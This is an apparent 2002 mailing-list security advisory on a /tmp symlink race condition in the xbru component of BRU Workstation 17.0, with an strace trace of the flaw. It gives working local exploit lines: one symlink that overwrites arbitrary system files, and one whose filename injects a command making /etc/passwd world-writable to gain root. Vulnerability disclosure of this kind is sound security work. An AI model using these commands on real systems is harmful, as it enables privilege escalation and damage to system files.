Backup / Restore Utility [BRU]
------------------------------

advisoryprophecy.net.nz - 04/09/02

About:
  - http://www.tolisgroup.com/
  - "BRU Workstation 17.0 Backup & Restore Utility is a functionally-rich
backup solution
    designed for commercial networked systems when the client/server
capability of BRU-Pro
    is more than you need. Available to support a multitude of platforms,
BRU Workstation
    protects data via NFS, AFS, SMB, and NetAtalk mounted filesystems."

Problem:
  - Race condition in xbru component.

Versions Tested:
  - 17.0 (Workstation Edition)

Exploit:
  - Confirmed testing that this vulnerability can be used to clobber
any system file:
    ln -s /file/to/clobber /tmp/xbru_dscheck.dd
  - Confirmed testing that this vulnerability can be used to obtain root
via spybreak's
    logwatch method (and possibly others):
    ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd
#`' /tmp/xbru_dscheck.dd

Notes:
  - Wait for root to navigate through xbru to 'list archive contents'.
    (a tape must be present in the tape drive for this to work).

Fix:
  - No response from vendor: (supporttolisgroup.com)

Note: This is a new discovery, not the same as:
http://online.securityfocus.com/bid/3970
but contained within the same product.
Unfortunately it seems that a fix was never released for this previous
race condition either.

Strace Snippet:

[pid 32159] execve("/bin/dd", ["dd", "if=/dev/nst0",
"of=/tmp/xbru_dscheck.dd", "bs=32k", "count=1"], [/* 38 vars */]) = 0
[pid 32159] open("/tmp/xbru_dscheck.dd",
O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 1
<snip>
[pid 32151] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
<snip>
[pid 32161] execve("/bin/dd", ["dd", "if=/tmp/xbru_dscheck.dd", "count=1",
"bs=216"], [/* 38 vars */]) = 0
[pid 32161] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 0
<snip>
[pid 32162] execve("/bin/bru", ["bru", "-gB", "-b4k", "-f",
"/tmp/xbru_dscheck.dd"], [/* 38 vars */]) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32163] execve("/usr/local/xbru/mounttape.tcl",
["/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"],
[/* 39 vars */]) = 0
[pid 32163] execve("/usr/bin/wish", ["/usr/bin/wish",
"/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"],
[/* 39 vars */]) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", F_OK) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
[pid 32162] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 3
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32167] execve("/usr/local/xbru/unmounttape.tcl",
["/usr/local/xbru/unmounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g",
"4"], [/* 39 vars */]) = 0
[pid 32151] lstat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644,
st_size=32768, ...}) = 0
[pid 32151] unlink("/tmp/xbru_dscheck.dd") = 0

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]